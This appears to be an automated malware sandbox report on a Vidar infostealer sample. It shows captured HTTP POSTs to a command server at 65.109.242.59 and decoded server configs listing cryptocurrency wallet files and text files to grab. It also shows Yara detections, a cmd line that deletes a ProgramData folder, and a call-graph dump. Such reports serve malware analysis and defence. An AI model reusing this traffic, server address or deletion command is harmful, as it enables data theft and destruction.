                                                                                  2024-05-24 15:47:25 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 48 49 44 42 46 42 46 48 49 4a 4b 46 48 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 48 49 44 42 46 42 46 48 49 4a 4b 46 48 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 48 49 44 42 46 42 46 48 49 4a 4b 46 48 43 47 49 45 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------JJDHIDBFBFHIJKFHCGIEContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------JJDHIDBFBFHIJKFHCGIEContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------JJDHIDBFBFHIJKFHCGIECont
                                                                                  2024-05-24 15:47:25 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:25 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:25 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                  Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  19 | 192.168.2.6 | 49737 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-05-24 15:47:26 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAE
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 331
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:26 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------DAKJDHIEBFIIDGDGDBAECont
                                                                                  2024-05-24 15:47:27 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:27 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:27 UTC131INData Raw: 37 38 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 78RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnw=0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  20 | 192.168.2.6 | 49738 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-05-24 15:47:28 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----EHIJJDGDHDGDAKFIECFI
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 453
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:28 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------EHIJJDGDHDGDAKFIECFIContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------EHIJJDGDHDGDAKFIECFIContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------EHIJJDGDHDGDAKFIECFICont
                                                                                  2024-05-24 15:47:29 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:28 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:29 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  21 | 192.168.2.6 | 49739 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-05-24 15:47:30 UTC | 280 | OUT | POST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----AKKEHIECFCAAFIEBGIDA
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 98173
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:30 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 48 49 45 43 46 43 41 41 46 49 45 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 48 49 45 43 46 43 41 41 46 49 45 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 48 49 45 43 46 43 41 41 46 49 45 42 47 49 44 41 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------AKKEHIECFCAAFIEBGIDAContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------AKKEHIECFCAAFIEBGIDAContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------AKKEHIECFCAAFIEBGIDACont
                                                                                  2024-05-24 15:47:31 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:31 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:31 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  22 | 192.168.2.6 | 49740 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-05-24 15:47:32 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----AKKKFBGDHJKFHJJJJDGC
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 331
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:32 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------AKKKFBGDHJKFHJJJJDGCCont
                                                                                  2024-05-24 15:47:33 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  23 | 192.168.2.6 | 49741 | 65.109.242.59 | 443 | 4784 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  2024-05-24 15:47:33 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----DAEBKKKEHDHDGDGCFBKJ
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 331
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:33 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------DAEBKKKEHDHDGDGCFBKJContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------DAEBKKKEHDHDGDGCFBKJContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------DAEBKKKEHDHDGDGCFBKJCont
                                                                                  2024-05-24 15:47:34 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:34 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Target ID:0
                                                                                  Start time:11:46:53
                                                                                  Start date:24/05/2024
                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                  Imagebase:0x380000
                                                                                  File size:363'520 bytes
                                                                                  MD5 hash:22152460B13E4C2473DC3FCDEA192933
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:1
                                                                                  Start time:11:46:53
                                                                                  Start date:24/05/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                  Imagebase:0x870000
                                                                                  File size:65'440 bytes
                                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:6
                                                                                  Start time:11:47:35
                                                                                  Start date:24/05/2024
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KECBFBAEBKJJ" & exit
                                                                                  Imagebase:0x1c0000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:7
                                                                                  Start time:11:47:35
                                                                                  Start date:24/05/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff66e660000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:8
                                                                                  Start time:11:47:35
                                                                                  Start date:24/05/2024
                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:timeout /t 10
                                                                                  Imagebase:0x720000
                                                                                  File size:25'088 bytes
                                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                    Execution Graph

                                                                                    Execution Coverage:4.4%
                                                                                    Dynamic/Decrypted Code Coverage:0.5%
                                                                                    Signature Coverage:1.7%
                                                                                    Total number of Nodes:1468
                                                                                    Total number of Limit Nodes:18
14132->14136 14133->14098 14137 38b0a7 __purecall 39 API calls 14134->14137 14138 38f373 __dosmaperr 6 API calls 14135->14138 14139 38f373 __dosmaperr 6 API calls 14136->14139 14140 38ebba 14137->14140 14141 38eb63 14138->14141 14142 38eb72 14139->14142 14147 38ee48 ___free_lconv_mon 14 API calls 14141->14147 14143 38eb8d 14142->14143 14144 38eb76 14142->14144 14145 38e92e __dosmaperr 14 API calls 14143->14145 14146 38f373 __dosmaperr 6 API calls 14144->14146 14148 38eb98 14145->14148 14146->14141 14147->14129 14149 38ee48 ___free_lconv_mon 14 API calls 14148->14149 14149->14129 14151 392fa2 14150->14151 14152 392fd1 14150->14152 14151->14081 14151->14096 14151->14100 14178 38a76a LeaveCriticalSection 14152->14178 14154->14091 14156 388f65 _Fputc 14155->14156 14161 388f8a 14156->14161 14158 388f7d 14172 388d43 14158->14172 14162 388f9a 14161->14162 14163 388fa1 14161->14163 14164 388da8 _Deallocate 16 API calls 14162->14164 14165 388d7f _Deallocate GetLastError SetLastError 14163->14165 14167 388faf 14163->14167 14164->14163 14166 388fd6 14165->14166 14166->14167 14168 389034 _Deallocate 11 API calls 14166->14168 14167->14158 14169 389006 14168->14169 14170 388f53 _Deallocate 41 API calls 14169->14170 14171 389013 14170->14171 14171->14158 14173 388d4f 14172->14173 14174 388dee _Fputc 41 API calls 14173->14174 14176 388d66 14173->14176 14174->14176 14175 388d79 14175->14081 14176->14175 14177 388dee _Fputc 41 API calls 14176->14177 14177->14175 14178->14151 14180 384799 14179->14180 14181 38479a IsProcessorFeaturePresent 14179->14181 14180->14106 14183 3850d2 14181->14183 14186 385095 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14183->14186 14185 3851b5 14185->14106 14186->14185 14188 394cc0 ___scrt_is_nonwritable_in_current_image 14187->14188 14190 394cda 14188->14190 14233 38a722 EnterCriticalSection 14188->14233 14191 394b89 14190->14191 14193 38b0a7 __purecall 41 API calls 14190->14193 14198 3948df 14191->14198 14192 
394d16 14234 394d33 14192->14234 14195 394d53 14193->14195 14196 394cea 14196->14192 14197 38ee48 ___free_lconv_mon 14 API calls 14196->14197 14197->14192 14238 38b19b 14198->14238 14201 394900 GetOEMCP 14203 394929 14201->14203 14202 394912 14202->14203 14204 394917 GetACP 14202->14204 14203->13864 14205 391e71 14203->14205 14204->14203 14206 391eaf 14205->14206 14207 391e7f 14205->14207 14208 38b188 __dosmaperr 14 API calls 14206->14208 14209 391e9a HeapAlloc 14207->14209 14212 391e83 __dosmaperr 14207->14212 14210 391eb4 14208->14210 14211 391ead 14209->14211 14209->14212 14210->13867 14210->13868 14211->14210 14212->14206 14212->14209 14213 38dac3 std::_Facet_Register 2 API calls 14212->14213 14213->14212 14215 3948df 43 API calls 14214->14215 14216 394dcf 14215->14216 14218 394e0c IsValidCodePage 14216->14218 14223 394e48 __fread_nolock 14216->14223 14217 384791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14219 394bf6 14217->14219 14220 394e1e 14218->14220 14218->14223 14219->13872 14219->13876 14221 394e4d GetCPInfo 14220->14221 14224 394e27 __fread_nolock 14220->14224 14221->14223 14221->14224 14223->14217 14223->14223 14280 3949b3 14224->14280 14226 3947dd ___scrt_is_nonwritable_in_current_image 14225->14226 14361 38a722 EnterCriticalSection 14226->14361 14228 3947e7 14362 39481e 14228->14362 14233->14196 14237 38a76a LeaveCriticalSection 14234->14237 14236 394d3a 14236->14190 14237->14236 14239 38b1b9 14238->14239 14240 38b1b2 14238->14240 14239->14240 14241 38eb00 __Getctype 41 API calls 14239->14241 14240->14201 14240->14202 14242 38b1da 14241->14242 14246 39256a 14242->14246 14247 39257d 14246->14247 14248 38b1f0 14246->14248 14247->14248 14254 3966ea 14247->14254 14250 3925c8 14248->14250 14251 3925db 14250->14251 14252 3925f0 14250->14252 14251->14252 14275 394d9c 14251->14275 14252->14240 14255 3966f6 ___scrt_is_nonwritable_in_current_image 14254->14255 14256 38eb00 __Getctype 41 API calls 14255->14256 14257 3966ff 14256->14257 
14264 396745 14257->14264 14267 38a722 EnterCriticalSection 14257->14267 14259 39671d 14268 39676b 14259->14268 14264->14248 14265 38b0a7 __purecall 41 API calls 14266 39676a 14265->14266 14267->14259 14269 396779 __Getctype 14268->14269 14271 39672e 14268->14271 14270 39649e __Getctype 14 API calls 14269->14270 14269->14271 14270->14271 14272 39674a 14271->14272 14273 38a76a std::_Lockit::~_Lockit LeaveCriticalSection 14272->14273 14274 396741 14273->14274 14274->14264 14274->14265 14276 38eb00 __Getctype 41 API calls 14275->14276 14277 394da1 14276->14277 14278 394cb4 __strnicoll 41 API calls 14277->14278 14279 394dac 14278->14279 14279->14252 14281 3949db GetCPInfo 14280->14281 14290 394aa4 14280->14290 14286 3949f3 14281->14286 14281->14290 14283 384791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14285 394b5d 14283->14285 14285->14223 14291 392988 14286->14291 14289 392c7f 46 API calls 14289->14290 14290->14283 14292 38b19b __strnicoll 41 API calls 14291->14292 14293 3929a8 14292->14293 14311 393c28 14293->14311 14295 392a6c 14298 384791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14295->14298 14296 392a64 14314 384522 14296->14314 14297 3929d5 14297->14295 14297->14296 14300 391e71 std::_Locinfo::_Locinfo_dtor 15 API calls 14297->14300 14302 3929fa __fread_nolock __alloca_probe_16 14297->14302 14301 392a8f 14298->14301 14300->14302 14306 392c7f 14301->14306 14302->14296 14303 393c28 __strnicoll MultiByteToWideChar 14302->14303 14304 392a45 14303->14304 14304->14296 14305 392a50 GetStringTypeW 14304->14305 14305->14296 14307 38b19b __strnicoll 41 API calls 14306->14307 14308 392c92 14307->14308 14321 392a91 14308->14321 14313 393c39 MultiByteToWideChar 14311->14313 14313->14297 14315 38452c 14314->14315 14316 38453d 14314->14316 14315->14316 14318 38a6c6 14315->14318 14316->14295 14319 38ee48 ___free_lconv_mon 14 API calls 14318->14319 14320 38a6de 14319->14320 14320->14316 14322 392aac ctype 14321->14322 14323 
393c28 __strnicoll MultiByteToWideChar 14322->14323 14326 392af2 14323->14326 14324 384791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14325 392c7d 14324->14325 14325->14289 14327 391e71 std::_Locinfo::_Locinfo_dtor 15 API calls 14326->14327 14329 392b18 __alloca_probe_16 14326->14329 14330 392c6a 14326->14330 14338 392b9e 14326->14338 14327->14329 14328 384522 __freea 14 API calls 14328->14330 14331 393c28 __strnicoll MultiByteToWideChar 14329->14331 14329->14338 14330->14324 14332 392b5d 14331->14332 14332->14338 14349 38f4f2 14332->14349 14335 392b8f 14335->14338 14341 38f4f2 std::_Locinfo::_Locinfo_dtor 7 API calls 14335->14341 14336 392bc7 14337 392c52 14336->14337 14339 391e71 std::_Locinfo::_Locinfo_dtor 15 API calls 14336->14339 14342 392bd9 __alloca_probe_16 14336->14342 14340 384522 __freea 14 API calls 14337->14340 14338->14328 14339->14342 14340->14338 14341->14338 14342->14337 14343 38f4f2 std::_Locinfo::_Locinfo_dtor 7 API calls 14342->14343 14344 392c1c 14343->14344 14344->14337 14358 393ca4 14344->14358 14346 392c36 14346->14337 14347 392c3f 14346->14347 14348 384522 __freea 14 API calls 14347->14348 14348->14338 14350 38f024 std::_Lockit::_Lockit 5 API calls 14349->14350 14351 38f4fd 14350->14351 14352 38f52a 14351->14352 14353 38f503 LCMapStringEx 14351->14353 14354 38f54f __strnicoll 5 API calls 14352->14354 14357 38f54a 14353->14357 14356 38f543 LCMapStringW 14354->14356 14356->14357 14357->14335 14357->14336 14357->14338 14360 393cbb WideCharToMultiByte 14358->14360 14360->14346 14361->14228 14372 389c89 14362->14372 14364 394840 